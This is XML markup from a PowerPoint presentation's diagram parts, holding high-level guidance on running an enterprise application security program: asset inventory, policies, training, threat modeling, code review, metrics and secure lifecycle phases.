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29"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId30"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="29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EAD5"/>
    <a:srgbClr val="00FF00"/>
    <a:srgbClr val="B93A32"/>
    <a:srgbClr val="672E3B"/>
    <a:srgbClr val="FFFF00"/>
    <a:srgbClr val="B3D6AC"/>
    <a:srgbClr val="FF00FF"/>
    <a:srgbClr val="4E8542"/>
    <a:srgbClr val="4A164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0" autoAdjust="0"/>
    <p:restoredTop sz="94383" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="113" d="100"/>
          <a:sy n="113" d="100"/>
        </p:scale>
        <p:origin x="4152" y="126"/>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algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Document all applications and associated data assets </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" noProof="0" dirty="0"/>
            <a:t>in a Configuration Management Database (CMDB).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="100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algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>Identify </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0"/>
            <a:t>the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>protection needs</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0"/>
            <a:t>of your </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>application portfolio</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0"/>
            <a:t> from a business perspective.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> This should be driven in part by privacy laws and other regulations relevant to the data asset being protected. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" u="sng" noProof="0" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>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algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Establish a set of focused </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>policies and standards</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> that provide an application security baseline for all</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>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algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Define a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>common set of reusable security controls </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>that complement these policies and standards and</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>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algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>application security training curriculum</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> that is required and targeted to different</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> development roles and topics.  </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algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Define and integrate </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>secure implementation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>verification</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> activities into existing development and</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> operational processes.  Activities include </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>threat modeling</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>, secure design &amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>, secure coding &amp; </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>code review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>penetration testing</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>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algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Provide subject matter experts and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>support services for development and project teams</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> to be</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>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r>
            <a:rPr lang="en-US" sz="1050" b="1"/>
            <a:t>Provide Management Visibility</a:t>
          </a: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algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Manage with metrics. Drive improvement and funding decisions based on the metrics and analysis</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> data captured. Metrics include adherence to security practices / activities, vulnerabilities introduced,</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>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algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000"/>
            <a:t> Analyze data from the implementation and verification activities to look for root cause and</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000"/>
            <a:t> vulnerability patterns to drive strategic and systemic improvements across the enterprise. </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> 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algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Conduct a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>capability gap analysis comparing your organization to your peers</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> to define key</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> 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algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Gain management approval and establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>application security awareness campaign</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> for the entire</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>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algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="de-DE" sz="1000" b="0" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>Establish assurance guidelines to properly define coverage and level of rigor required.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>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algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Accordingly measure and prioritize all your applications and APIs. Add the results to your CMDB. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" u="sng" noProof="0" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>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algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Establish a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>common risk rating model</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> with a consistent set of likelihood and impact factors reflective</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> of your organization's tolerance for risk. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" u="sng" noProof="0" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>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algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>application security program</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>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29073">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5" custScaleY="102041">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dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="5" custScaleY="104312">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>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dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>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53179D04-4118-4358-AD17-8CE5C48A534D}" type="presOf" srcId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{68D71606-5C52-434C-93A7-B1ED203D82B8}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" srcOrd="0" destOrd="0" parTransId="{0B3561F2-F580-4BA5-B06C-3004CD728F94}" sibTransId="{2CCD953C-110F-4B11-9CBE-349755B93BC6}"/>
    <dgm:cxn modelId="{23A55926-6632-4C49-BE69-326A87E18CBC}" type="presOf" srcId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9478E13A-DF1E-ED49-B6C0-4CD064367697}" type="presOf" srcId="{84E62741-DE92-5D48-8E11-F5450775D2EB}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{43FBE940-8BFA-4EF5-A55D-083FACE306D9}" type="presOf" srcId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1FC62C5B-88D3-46E0-A53E-57D4877596DC}" type="presOf" srcId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F474165F-1E84-42E2-A98E-15E6795C7260}" type="presOf" srcId="{29D76988-94EC-456A-9326-82A5AA778D9E}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{86012D62-A2D0-4619-82DE-82E2DAD81915}" type="presOf" srcId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{98A34C67-44A9-4549-AA2A-CA6F6EDBEB03}" type="presOf" srcId="{146439ED-B762-48F0-BE3C-0D5D54E004EE}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F5AF1F6E-9C66-4796-998A-0AAADCF54EA0}" type="presOf" srcId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{73DAC175-225C-4995-9056-E10EE015E040}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}"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34BF083-B836-4506-BB3B-F0A01920D227}"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47978A9A-6752-440E-A60A-B6074541D436}"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4FF662A7-AB28-429F-864C-7ABE5405F113}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AFB279A7-B036-2C4F-8DD8-37D715363A86}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{84E62741-DE92-5D48-8E11-F5450775D2EB}" srcOrd="1" destOrd="0" parTransId="{5330F5FD-52B0-144C-814A-D62027712440}" sibTransId="{2C02DB81-333D-C748-8AF4-65359B719E74}"/>
    <dgm:cxn modelId="{4D4901AE-986B-4432-9DC1-4E0F95A75C0C}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0"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B1E24C1-9646-4B11-BED2-E864AE96290B}" type="presOf" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EDF5A9CC-CC5C-44FB-AD2F-4A9588D299B6}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{99A0BECD-C0EB-442E-A14E-115C6C2004C6}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}" srcOrd="1" destOrd="0" parTransId="{F2853B7C-C640-407B-AE16-3B6A7DC44BF1}" sibTransId="{BC7E3830-1E0B-47C9-BCFB-30E22DBC39D8}"/>
    <dgm:cxn modelId="{572A4DD0-8BB0-43D8-A35E-9D4C730E38BD}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0"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754476D4-7D8C-427D-8A6B-D0B60927777C}" type="presOf" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>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85EDB1E7-A378-4F0C-B0F9-C3AC2705555F}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0"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27C6B4EA-C9F4-486C-848E-B16B069FBF21}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" srcOrd="0" destOrd="0" parTransId="{C24D1CFC-B59D-48F6-8B6A-AD23468C518D}" sibTransId="{A2F85221-5EC1-4B22-9833-6E3F4447E6C8}"/>
    <dgm:cxn modelId="{5F96E2F6-EA13-4774-9421-1F0DDEB7BDED}" type="presOf" srcId="{ABA88485-4799-4A3E-A395-465F2466FC90}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F5234BFB-0653-49D4-A393-2589918EFE10}" type="presOf" srcId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B1A30578-DD79-4939-A9F8-28AD03B8AD54}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6CB25451-4220-4743-96D9-4B8B3C4F99CD}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{617DA6D3-BEB8-4800-B1FC-98C29EF082A0}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9C6E9520-F5C2-41C7-A061-0140218D1DED}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A201EAD9-991A-486D-9848-464B08813756}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{36BB49A6-E6C7-4A97-BA09-E504B9A5CB87}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{73C77C7A-7151-4540-A36C-02BAF86C1D7F}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6FF81300-4B71-426C-BE41-95BEFFB4F7EB}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C2CAE34C-DC3F-402B-9C24-F36E10DF6763}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1A025FFD-43A9-440F-BAC4-21396F32E15C}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{00B07580-E77C-441E-9EF2-B3E1DE4DA8D2}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3F81A852-98E1-4146-8C30-A1EE27A68299}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C265CBBA-7FC7-4526-B04E-A83BFEDA4408}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{26135150-1EEE-452C-9216-92014AD56077}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{505F2738-E317-4DE0-968D-8CAB62E9FE6A}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{98C8E5A8-9EB9-4BBF-9275-14B19FB13AD3}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D700CFC9-8390-4DFA-A6C1-CF888D9B4617}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D6106061-6CBE-4AC7-A61D-98FB10E8573B}" type="presParOf" srcId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6BDF4D38-2D31-4652-8413-675C17D298B1}"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1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent5_2" csCatId="accent5" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0"/>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dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" sz="800" b="0" dirty="0"/>
            <a:t>Collect and negotiate the business requirements for an application with the business, including receiving the protection requirements in regard to confidentiality, integrity and availability of all data assets.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" noProof="0" dirty="0"/>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00" noProof="0" dirty="0"/>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00" noProof="0" dirty="0"/>
            <a:t>Planning and </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0"/>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dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:endParaRPr lang="en-US" sz="800" noProof="0" dirty="0"/>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00" noProof="0" dirty="0"/>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dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0">
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" dirty="0"/>
            <a:t>To ensure secure operations and changes, the following should be performed:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" noProof="0" dirty="0"/>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dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0">
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" dirty="0"/>
            <a:t>The process of retiring systems is often overlooked. You should ensure that:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" noProof="0" dirty="0"/>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r>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0"/>
            <a:t>Deployment, Testing and Rollout</a:t>
          </a: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dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
